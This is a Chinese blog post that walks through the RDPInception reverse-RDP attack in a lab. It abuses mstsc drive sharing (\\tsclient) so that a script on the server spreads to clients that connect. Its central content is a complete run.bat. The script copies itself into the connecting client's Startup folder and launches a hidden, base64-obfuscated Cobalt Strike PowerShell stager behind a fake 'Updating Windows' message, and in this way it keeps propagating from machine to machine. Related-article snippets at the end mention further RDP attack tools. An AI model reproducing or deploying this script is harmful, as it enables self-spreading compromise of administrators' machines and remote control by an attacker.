基于文件传输的RDP反向攻击

最新推荐文章于 2023-07-29 09:00:00 发布
最新推荐文章于 2023-07-29 09:00:00 发布
阅读量1.5k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/119453197
版权

1.简述

        RDP反向攻击的姿势有不少,本次是通过挂载盘符进行 RDP 反向攻击。其基本原理就是Windows 远程桌面客户端 mstsc 有一个盘符挂载选项,如果勾选了该选项,会开启磁盘共享功能,相当于将你的磁盘在远程主机上共享,你可以通过类似于 SMB 文件传输命令那样将位于远程主机上的文件复制到客户端主机上。如果我们通过相应的设置,在客户端连接远程主机的一瞬间,将远程主机上早已准备好的木马程序复制到客户端主机的启动项中,那么当客户端主机下一次启动时便会执行该木程序,客户端主机便可以成功上线。这种攻击方法又被称作 RDPInception。

攻击机:192.168.153.136          受害机:192.168.153.132     

2.mstsc挂载盘符

1)攻击机:Windows 远程桌面客户端 mstsc.exe 连接时设置详细信息,开启驱动器共享

2)攻击机远程登录受害机,在受害机的“网络” 中便可以发现一个名为 “tsclient” 的主机

3)这其实就是开启磁盘共享后,受害机为连接他的攻击机分配的名称。然后通过以下格式的命令便可以在受害机上访问连接他的攻击机了

dir \\tsclient\c    # 列出攻击机C盘目录

copy file \\tsclient\c    # 将文件复制到攻击机中

4)使用 “tsclient” 列出了攻击机上的C盘目录

5)使用 “tsclient” 将受害机上的test.txt成功复制到了攻击机上

        这种访问方式类似于使用 SMB 进行文件传输,虽然本质上都是 SMB 协议,但是使用 tsclient 无需进行身份认证。但要注意的是,只有通过远程登陆的用户才可以在受害机中访问tsclient,其他在受害机上本地登录的用户是无论如何也无法访问 tsclient 的。

3.RDP反向攻击

RDP反向攻击思路是在受害机的启动项中写入一个 .bat 脚本(run.bat),当一个客户端用户通过远程桌面连接到这个受害机时,在登陆之后会立即执行这个启动项中的 run.bat 脚本。run.bat 脚本执行后会首先遍历 tsclient 共享,发现 tsclient 共享后就会将自己复制到 tsclient 也就是连接受害机的客户端主机上的启动项中,然后执行一个 Cobalt Strike 生成的 PowerShell Stager。然后,当客户端主机重启或者注销重新登录后就会再次进行上述过程,同时会使客户端主机上线。

1)编写简单的run.bat脚本

# 关闭echo响应功能
@echo off
echo Updating Windows ...
# 关闭echo响应功能
@echo off
# 设置一个短时计数器,以确保tsclient进程被完全加载
timeout 1 >nul 2>&1
# 如果当前远程主机上可以访问到 tsclient, 则可以成功将 run.bat 通过 tsclient 复制到客户端主机上
copy C:\ProgramData\Microsoft\Windows\Start" "Menu\Programs\StartUp\run.bat \\tsclient\C\ProgramData\Microsoft\Windows\Start" "Menu\Programs\StartUp
# 最后执行 Cobalt Strike 生成的 PowerShell Stager
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAEQAQwBKAG0AcgBaAHQAQgBkAHYATAAyAFUAeAB5AEYARQBRAFIAUQBSAFIAdgAyAEsAZgBUAEsAYQBBAFUARgBDAGcAbwBMAG8ASgBuADUANwA5AHYAZwBkAHIAVABzADkATwB6AE8AOABtAHUAaQBhAEUASwAzAHMAdABUAHoAMwB1AHAAVgA0AFgAUgBvAHgAcABoADIANABnAGsAWgBFAEwAcQBjAFEAVgB4AGEAQwBPAFAAbwB1AC8AdgBkADcARgBuAFIAUABrADYAWAA3AHoAdABZAGYAVABtAFkAMgBTADgAQQBkAFAARQBNAEEAeQBwAHYAKwAvAHYARgBJAEMAQgBTADUAVwAvAEoAQQBDAC8AdQBjAGkATQBIAFYAaQBsAGkAawAwAHUAQwBNADAAWQB3ADgAcgBkADMAZgAxAGQAOABTAHIAMgBRAHIAQwBEAGIAeAA2AEkANwBBAFMAKwB1AFQAQwB5AGsAQgBsAFMAWAA2AG4AeQBTADgALwAzAE8AZQBRAEMAMgAzAHYAOQA0AHcAOAAyAHgAaABoADYAMABXAFYAZgBHADgASwBvAEYANABiAFEAMQBSADAAYgBoAHUAVQBLADkAVQA5AHEAYgBVAEUATQBIADYAZgA2AEEAUgBvAFIAOQBUAGYAMQA1AGEAMAAyAGQASgBBAE8AbgBLAHQAWQB4AGcATABEAEkAcQBmAG8AZQBXAGIAKwBiAFkASQBNAGsASgArAGcAcAB2AHEATwBIAFoAVgBMAGYALwAxAFYAcQByAHcAOABOAGwANQByAGcAeQBBAEcAVABsAGcAdQBxAFYAawBZAFEAYgBkAG0ATwBrADYAcABRAG4AMgByADUAQQA0AFgAbQBRAC8ATABKAGMAawAyAE0AQQByAFIATABxAHEAdABiAFkAKwBoAGEAOABzAEMAdgBWAHkAQQBsAHkANwBZAFMANQBYAHIAeQBmAFkAKwBJAE8AZgA0ADkAUwBGAHoAcQB4AGUAZABjAG8AawBzAEYAYwBKAE4ANwA4AEoAaABxAFUAcQA5ADUAUAA1AGUAWABsACsAcABQADkALwBSAHoARwBNAHYAcwBsADEAWQBFADcAdwBJAFkAdQBTAHIARQBDAGUAMgBBAGMAUABhAEMASABpAG0AQQArAGQAdwBSADkAUgBLAEkAWQBtAFoAdAB5ADkAVgBDAEEAZwBNAG8AeABoADcAMQBBADAATAAwAFUAdgBRAEUAWgBhAC8AZQBMAEgAagBWAEkAbgBkAGwAOQArADEAKwAxAHEAVwA0AGUAbABHADcAdQA4AHEAbABUADgAcQBFAFMAawBsAHcAcABYAHEATgBTAGQAKwBoAHcANgBwAHkASgB1AEwATwBYAEsAYwBuADkAQgAvAFMASwA0AEsAKwBmADIAVQBZAEoAWAA3AGIANQArAGwAcQBnAGsAZAB1AEEAYwBSAGYASQBzAEkAdgB4ADkAeQA5AGYANwB1ADcAcQBWAFkAUQBuAEsAZQBzAG8ASgBDAHUAOQBEADcAUwB0AFcAcgBsAEUAUgBBAGcAQQBqAGgATABBAC8AbgBBAHMAZQB3ADgAdgBvADkAUABoAGUAMwBOADgAMgB3ACsAawB0AEQAagBaAHYAVwBWAGUAYwBTAG4AZwB1AE8AcgA5AFQATABDAHQAbgBtADYALwAxAGQANQBmADYAYQBQAGYAbgA3AE4AegAyADIASABSAFAAaQAvAFAAdQB2AHEANABHAEQATwA5AHUARABYAE8AWQBCADEAegBaAHUAQwBWAC8AKwBMAEcAWgB3ADUAOABDAEMAagA5AHAATgBUAEMAWQA0AHkANgBYAHIAQgAyAGgAeQBWADMAWgBLAE8AYQBFAHYAUAA2AHMATgBYAEQAdAA2ADEAKwAxAGYAdwBQAFUATQBFAHYAZQBRAG8AQwBJAHAAVQBmAGsAUgB6AEMAVwBHADUAWgBMAGcAUwBkAEEAbAAvAEYAMwAyAEoARQAyAC8ANwBFAGkAWgB3AFoAdgAwAHQAYgBTAHkAbQAvAGQAOABuACsAYwB5ADYANABBAHcAcgBGAEoASwBUAE8AcgBjAHEARgBJAHEAQgBBADQAMABxADEAVABQAEMAKwAzAHIAcAAxADQAYwBvAFcASgBaACsAZwA1AFgAaQBwADMASQBOAGsAQQBZADMAYwB5ADkAVgBqADYAaAA5AE8AcQBhAFIAUgA2AHAAbQBOAGcAZwAwAFMAVQAwAEwARgBRAGYARwBqAFoAdwBjAGwAYQBxADEATQBnADIAWQBUADkAVAA3AGYAMABOAFEAdQBsAFQAVABsAGoAZwBPAEsAVABrAGkASwBXAEUAeABJAFMAOAB5AGIAbABRAG8AegB4AG4AcwBGAG4AOQA5AC8AeQBvADEARgBRAFkAQwBhADcAdgBRAEoAZABJAEYAMQAyAEkAZAA4AEMAZQA5AEoAeAByAFIAUgBYAHAAQgB2AGIAUQBMAFAAMABIADIATABjADYAdQBSAFIARgB6AHQAVwBOAHAAQQArAGcAUwBRAEsAbwBEAG8AcQBxADEATQByAEcARQBlAGwAcgBwAGUAcABQAGkAZgBlAC8AdwBmAHUAeAB4AGYAdwBBAGsAOABYAHcARwBzAGgAeQBVAFkAagBDAGoAagBUADAAUwB4AGMAZwA3AEkAVAAyAG0AVABSAGoARwBGAEMAZABTAGwANgBDAEwALwAwAHMAeQBtAHUAcABNAEcAUABrADEAOAAzAFgAZAA2AEkATABXAG4ARgBFAGwASABpAE0AMwBEADQASQBZAGEAdQBwAEYAagAyAHUAWABHAEwAbwBlAEoAOQAyAGwAVQBrAHIAawB3ADQAQwBQAGMANAAwAFQAMAA0AE4AYgA0AFUASABDAFQAOABFAEwAUwB1AGQAMABUAEUAeQBGAGgARQBPAFIAZwBPAE8ANwBPAGMARwBIAFkAYgBPADAAUABGADEAYQB4AEsAQQBkAEgASQA0AHAARgAxADIAawB3ADIAVQBIAGoAMgB4AFcALwBhAHoATABjAFMAVAAvAHQAbgBqAGIAYwBNAGwAZQByAE0AcAAwAHUAWgBkAEwAQwBRAHkAagA1AHkAdwBMAGIATAA4AGUAZwBuAHMAUQAxAEQANABpAHQAMQBtAHcAeAB5AEEAYgBIAEkAMgBXAGgAYQBlADAAaABCAHAASgB6AGsAUQBFAHEAVgBuAHIAaABPAGoANQBZAHEASQBiADAAVgBFAGQAeABVAFAAWQBoADgAUAA0AHEAbQBpAHgAWgBOAGcANABnAHAAMgAwADAAcQA0AFYAVABSAE8AaABHAEYAbgBKAE4ASQBhADYARABoADYARwB4AGIANgBaAHAARAA3ADAAbwBKADkAQQB2AEwAOQB1AFoAdgB2ADcAWQBDAEYATwBQAGUAagBFAGYAWQBoADAAMgBqAEIAOQBiAGkAdABlAGIANABOADEALwBIACsAZgBKAEoAdAB3AHoAeAB6AGsAQgA2AFQAOQB6AEcAUwBEAEQAOQBrADUATABPAHgATwB4ADQAUAB3AEcAOABzADEAVwBOAEQAWABDAHkAMwBHADgASgBOAEEAdwBTAFkAMQAxAHQAWQAxAFgAdwBuAFcAZgBXAFcAUgAwAGIAWgA0AGcASgBiAHcAaABPAE0AYwBvADcAVABOAHUAagB4AFcAZgBPAFAAVwAzAE0AVgBEAEIAaABGAEYANQBZAGoAQgB3AGYAeAAyAEgAWQBiAFUAbAAzAEkAcgBqAEwAdQBPAEYAUABWAFAAbgBtAEsAVwAxAE0ATQBPAHMALwBtAG0AYwA1AEcAZgBoAE8AMABzAEUAMAA0AFQAWQBtAGYAZABzADYAdgBzAFEAdwBQAHcAbgByAHEARwBSAHYAZQBkAGcAMgBMADUAdQBZAEgAbwArAHYARwB3AFQAUABCADMAUgB6AEoAWQAzAEcAVAA0AGkAQQBhADQAeQBCAHgAZwB1AGUAcABZAHUAUwA0AEMANwAxAGMAZgB0AFoAMABwAGcAMABpAEgAKwBpAEgAaQBRAGcAZQBCAEYAcwA2AGcATwA0ADUAbgBJAGcAdwB5AGQAZQBaAHcAbwBsAHAASgBoAHkARQBUAHQAegBQADkAYgBnAFIATAB3ADAARwA2AFAARABNADAAWgAxADAAYwByAEsAVQA2AGIAVAB0AFkAVAB4AG0AOQBLAFQAZABiAFMAZgBLAGYASABNAE8AMgB2ADEAQQAzADYAVgBvAEkARwA1ADQAMQBSADIAYwBRAEMAZQBZAHkAMABrAHEAYwBDAHEAdgBlAHUAMwA5AGsANwBRAGMAZQBkAE8ANQAzAG4AaABPAHAAcwBzAEcAagBaAC8AeABJAGUAaQBMAEIAMQBWAHMAbQAwAG8AYQBNAFIAbQB5AHgARwBaAHoASAA5AGcAeQB2AFIAeABzADUANQB3ADcASABzAHkAUABqAGMAMQB3AEoAcwBjAEwAMwBoAEUAWAA5AFMANwBMADkAVABWADUAYwBKAEkAbQBzADAARQA2AFgAZABiAEgARwAvAFgASQBLADMATgByAHoAKwBsAGUAUAA5AGoAdQBKAGMARABOAEoAYQAzAEgAegBFAGsAOABUAEcAbgBGADkAegBoADkAWQAzAEQAOAByAEwANABZADkAbQBSAG0AdQBmAFIASAB1AGIAMwBDAFIAcgByAG4AdABIAFUAYQBiAEMAMgBrAGIAZAAwAEcAYgBmAFIAUQBMAEsAcgBLAC8AbQBIAHgAWgBIAFkAMwBSAHoAbwB4AFQAaQBDAGcANQBhAEgAUwBsAGEAVgBWAEsAbwB6AGgAMAB4AE4AcABSAFAAeABPAFAAUQB3AFgAdgBHADAAMQAzAEQAMgB5AHAASgBNADYAdwBqAFEASQBWADgATwBtAEoANwBQAG0AUABoADAAdwArAG8AcABiACsAVgBIAG0ASgB2AGIAVAB2AEIAawAwAFEAeQBtAGIAVwB0AE8AKwBFAGcAWQBzAGoAbABRAGQAVABIAHQAVwA3ADUAZwArAGQAUwBiAE0AcwBDAG4AdQBkADAARgA0AEgAdABmADkAZQByAHgAeAB4ADQASQBMAEUAegAxAHMASwB5AEwAUAA4ADEAbwBuAEoAZQB3AHQAVwBHAG0ANAB5AHIAaQArADYATwBOAEcAbAA0AHQAWAAzAHQAUgB0AFcAeABPAGsAUgBNAFoAWgBYADQAWABIAEEATABzAHUAagB5AFYAdgB2AEoAUQBRAEwAYgBLAE4ARgB1AEsANgBoADIANAA5AHEAeQBlAGIAWgByADMAcgBkAHgANgBzADcAYwBQAG0ASwBXADYAUgBwAE4AawBvAGEANwBpAHQAeAAvAEsAbwAyACsASgBUADUAcQB3AHkAQQBlADkAcABaADUAZQBVAGEAcAB2AHQAYwBWAFAAMgBBAGIARwBaAGYAagA1ADIAdABEADYAWQBaAGUAawBRAG4AQwBSAHQAaQBDAHcARgBpAGQAcAB1AFQAZQA4AEEAbQBMAEcAOABrADgAYgBoAFEAZgBPAFoAaABZAFAANAB4AGkAVwBuAGcAeQAzAEoAVgBWAEsAagBvAGkANgBjADgAMQBvAFYAZwBWAGIAVQByAEwAaQBGAFQAZgBPAFUAUgBtAGMAYQB0AFAAcwBuAFkAeABnAEgASwBmAG4AWABTAFUANAArAHIASQBuAHMASwBaAGMASgBBAHAAcgBrAHQAYQBTAHYAZwB4AFAASgBhADkARABpAHYARgA1AEwAUAA2AHkAZQBWADMAegBBAHoAcgBFAFEAcwA2AFQAdQA5AFQAcABrAG8AagBiAEkAdABJAE4AQQA3AEIAbwBQADMAQwBTAFIAMgB3AGIAVABGADgAQgBnAFYAbABmADUAZQBTAGcAUABMAEcAMwBHAHoAWQBYAFoAZwBKAFYAUwBuAGwAbgBwAFIAYQB2AGMASQBVAHkAbQBuAHoAUwBmAEsAUAA1AEIAawBlAGUAagBFADEASAB2AEQAWQArADAATwBkAEoAZQA4AC8AYwBQAEQAMABWAEwAdgBIAHYALwA5AFAASQBsAGYAYgAyAE4AawBlAC8ANwBSAHoAMABsADUAcABqAG4AKwA3AHQAdgB0ADMAawBoAEEAUgArADYANQBxACsAbQBNAHcAbgBnADAAQQBJAE8ANgBhAFoAawB3AHIAcgBkAGoAegB6AEMALwBIAFYATwBVAHAAQwBkAGEANQBUAEwAbgA0AC8AMgBSADQAZwA5ADYASgBDAHgAbAB3AHoARwB0ADEAdQBsADUAegBqAEkAeQBDAGUANwBYADQAeABZAGYANwA3ADMAZgBYAEoANwBMAHMAbQBTAG8AVAA5AGQAVgBiADUAZgBFAEoAWABLADcAZQByAFQANAA5ADIAdQBHAEgAKwB1AFIANwB4AE4AZwBkACsAdgBrAGkAMAA1AFgALwBVAEQAawBSAFAAbwA3AFMATwByAFMAdABWAFQAcABsADYAdgA1ADgAOQBtAG4AVgBqADcAZgBXAEoAWQA1AEcAZgBsAGQAMwB2AFYAZgBQADcANwBBAE8AVwBqAEsANgBkAHcAOQBUADYAdwA0AGQAaAB6ADQAZgA4AHgAQgBqADkANAAvAGUALwBzADUAdgB3AFYATQArAFIAMwA5AGcAcABFAG4AMQBPAFcAWAA4AHIALwBBAHQAQQBxAGoAZQBmAGoARABRAEEAQQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==

2)将编写好的run.bat放在受害机系统启动项目录中

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

3)将受害机注销,攻击机进行远程连接,当连接成功时,受害机中启动项目录中rub.bat文件就会执行,受害机CS上线,且会将启动目录中的run.bat文件复制到攻击机启动目录中

4)当被攻击机重启或者注销重新登录之后,run.bat 里面的 PowerShell Stager 就会执行,攻击机就会CS上线

        RDP反向攻击成功,如果再有开启了驱动器共享的机器远程连接攻击机,那么攻击机启动目录中的run.bat会拷贝到这台机器启动目录中,这台机器注销或重启重新登录后,run.bat 里面的 PowerShell Stager 就会执行,这台机器就会CS上线,可继续进行RDP反向攻击(套娃)。

4.RDP反向攻击限制条件

(1)客户端的mstsc.exe必须要开启驱动器C盘共享

(2)客户端用户权限是管理员权限

chaojixiaojingang
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
freerdp编译文件wfreerdp.exe
10-31
freerdp基于RDP协议,是一种专门用于远程桌面连接的协议。源码可以从github上下载,资源为编译后的exe文件,包含win32和win64 freerdp 常用参数说明: //远程电脑 wfreerdp.exe /u:用户名 /v:目标主机地址 //远程电脑...
RDP攻击
weixin_42584507的博客
01-12 239
RDP (Remote Desktop Protocol) 攻击是指通过利用 RDP 协议中的漏洞来进行的网络攻击RDP 是一种远程桌面协议,可以让用户在远程计算机上运行应用程序和控制远程计算机。由于 RDP 是一种开放的协议,因此它可能存在漏洞,可能被黑客利用来进行攻击。这类攻击的目的通常是控制远程计算机或窃取敏感信息。 ...
内网渗透测试:基于文件传输RDP 反向攻击
qq_44005305的博客
07-29 220
通常认为远程桌面协议是连接远程计算机的安全且值得信赖的应用程序,全球数以千计的 IT专业人员和安全研究人员都在使用远程桌面协议管理者自己的计算机设备,无论是用于帮助远程工作人员还是在安全的 VM 环境中工作,RDP远程桌面客户端都是非常宝贵的工具。然而,这一值得信赖的应用程序并不是完全可靠的,在我的《内网渗透测试:初探远程桌面的安全问题》这篇文章中,我大致罗列出了常见的用于攻击RDP 远程桌面的方式。本节我们就一个问题进行探讨,即如何通过远程桌面服务端反打连接他的客户端。
开启rdp_RDP反向攻击
weixin_26757949的博客
01-13 972
RDP反向攻击介绍这里讲两种攻击方式:利用挂载盘符进行攻击利用CVE-2019-0887进行攻击两者都是在攻击的登录远程桌面时,向攻击者PC的启动目录写入恶意文件,需要重启才能运行恶意文件。我这里测试的时候,存在很多问题,尤其是后者,较不稳定,按照严格意义并没有复现成功,也许是操作系统问题,也许是代码问题。利用挂载盘符原理是通过访问tsclient,并通过目录遍历找到启动目录,将恶意文件...
rdp反向攻击利用总结
weixin_44747030的博客
11-19 719
rdp反向攻击
rdp协议服务器会反连客户端吗,反向RDP攻击RDP客户端上的代码执行
weixin_39542850的博客
08-10 963
一、概述远程桌面协议(RDP)被全球数以千计的IT专业人员和安全研究人员使用,它通常被认为是连接到远程计算机的安全可靠的应用程序。无论是用于帮助远程工作人员还是在安全的VM环境中工作,RDP客户端都是非常宝贵的工具。但是,Check Point Research最近在常用的远程桌面协议(RDP)中发现了多个严重漏洞,这些漏洞允许恶意行为者反向通常的通信方向并感染IT专业人员或安全研究的计算机。 这...
RDPWpf远程连接控制文件传输
09-25
WPD RDP远程连接控制,可通过鼠标、键盘控制远程主机,多屏主机只显示一屏。可进行文件传输,上传、下载文件。
RDP Wrapper对应的配置文件
02-13
RDP Wrapper对应的配置文件,支持10.0.1904.1503
RDPcopy:通过RDP剪贴板同步复制文件
05-16
通过RDP剪贴板同步复制文件。 这两个脚本使您即使启用了“不允许驱动器重定向”策略,也可以通过RDP连接复制文件。 此策略使得无法将文件从远程系统本地复制并粘贴到主机系统。 如何: 将文件拖到远程系统上的...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
内网安全:横向传递攻击RDP || Cobalt Strike )
网络安全领域___专研者.
06-11 2185
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
rdp连接工具_通过反向 SSH 隧道连接 RDP
weixin_39783149的博客
11-27 1137
本文作者:hl0rey(信安之路作者团队成员 & 信安之路红蓝对抗小组组长)成员招募:信安之路红蓝对抗小组招募志同道合的朋友这是这个系列最后一篇了,想要看更多内容请大家移步到原网站查看吧,这个系列的翻译可能会存在问题,希望大家可以理解,在实践中遇到问题欢迎与我们交流,有对红蓝对抗感兴趣的同学欢迎联系组长加入组织。22检测发现设置为密码永不过期的用户通常来说我们会把一个服务账户的...
RDP中间人攻击
帅醉了的博客
10-04 867
前言:靠着网上的资源一点一点的啃。 内网渗透中,发觉有机器开了远程桌面,可以使用RDP中间人攻击进行持久控制和横向渗透。 攻击成功具备的条件 同一个网段 知道连接者ip,被连接ip。 工具:Seth git clone https://github.com/SySS-Research/Seth.git 使用方法 ./seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [&
RDPInception攻击手法
谢公子的博客
04-28 2412
在讲RDPInception攻击手段之前,我们先了解一下RDP远程桌面(Remote Desktop Protocol)协议。RDP远程桌面协议(Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让网站管理员通过网络连接远程操控服务器。RDP协议默认使用的端口是 3389。 由于RDPInception攻击要求的条件比较苛刻,在现实生产环境中几乎不...
微软反向 RDP 漏洞补丁不当,第三方 RDP 客户端易受攻击
smellycat000的专栏
05-15 668
聚焦源代码安全,网罗国内外最新资讯!作者:Ravie Lakshmanan编译:奇安信代码卫士团队还记得反向RDP攻击吗?易受路径遍历漏洞影响的客户端系统通过微软远程桌面协议远程...
RDP服务针对性攻击、钓鱼邮件攻击和勒索病毒家族Phobos研究
不忘初心,护天下安全!
05-01 743
RDP服务针对性攻击、钓鱼邮件攻击 勒索病毒phobos
使用rdpproxy和rdpy对RDP进行中间人攻击的总结
kevin_bobolkevin的博客
05-30 6416
RDP远程桌面协议分析 一、总述     本文是想通过分析对RDP协议进行协议还原,在总述这章描述了本次分析后对RDP协议还原的可行性;在第二、三章节描述了RDP协议交互的具体过程;在第四章节描述了使用中间人攻击的方法进行解密的可行性测试;在第五章节列出了本次分析过程中参考的相关资料。 1.分析目的 通过分析能够对使用RDP协议的远程控制工具的操作进行还原,比如:在远程过程中对远程桌面的文
19041.3155 rdp 配置文件
最新发布
02-07
19041.3155 RDP配置文件是指在Windows操作系统中使用远程桌面协议(RDP)连接其他计算机时所需的配置文件。RDP是一种远程桌面协议,可让用户通过互联网或局域网远程访问其他计算机,实现远程控制和管理。 配置RDP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值